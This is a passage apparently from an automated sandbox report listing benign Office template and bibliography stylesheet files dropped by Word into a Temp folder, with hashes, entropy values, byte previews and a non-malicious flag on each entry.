                                                                                                                                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D89.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):252
                                                                                                                                                        Entropy (8bit):3.4680595384446202
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                                                        MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                                                        SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                                                        SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                                                        SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7D89.tmp\architecture.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5783
                                                                                                                                                        Entropy (8bit):7.88616857639663
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7DCE.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.4670546921349774
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                                                        MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                                                        SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                                                        SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                                                        SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7DCE.tmp\ThemePictureAlternatingAccent.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5630
                                                                                                                                                        Entropy (8bit):7.87271654296772
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7DDE.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):256
                                                                                                                                                        Entropy (8bit):3.4842773155694724
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                                                        MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                                                        SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                                                        SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                                                        SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7DDE.tmp\ConvergingText.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):11380
                                                                                                                                                        Entropy (8bit):7.891971054886943
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7DDF.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):332
                                                                                                                                                        Entropy (8bit):3.4871192480632223
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                                                        SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                                                        SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                                                        SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7DDF.tmp\mlaseventheditionofficeonline.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254875
                                                                                                                                                        Entropy (8bit):5.003842588822783
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                        MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E0F.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.5502940710609354
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                                                        SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                                                        SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                                                        SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E0F.tmp\iso690.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):270198
                                                                                                                                                        Entropy (8bit):5.073814698282113
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E10.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):332
                                                                                                                                                        Entropy (8bit):3.547857457374301
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                                                                                        SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                                                                                        SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                                                                                        SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E10.tmp\harvardanglia2008officeonline.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):284415
                                                                                                                                                        Entropy (8bit):5.00549404077789
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                        MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E31.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):302
                                                                                                                                                        Entropy (8bit):3.537169234443227
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                                                                                        SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                                                                                        SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                                                                                        SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E31.tmp\iso690nmerical.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):217137
                                                                                                                                                        Entropy (8bit):5.068335381017074
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E32.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):290
                                                                                                                                                        Entropy (8bit):3.5081874837369886
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:8D9B02CC69FA40564E6C781A9CC9E626
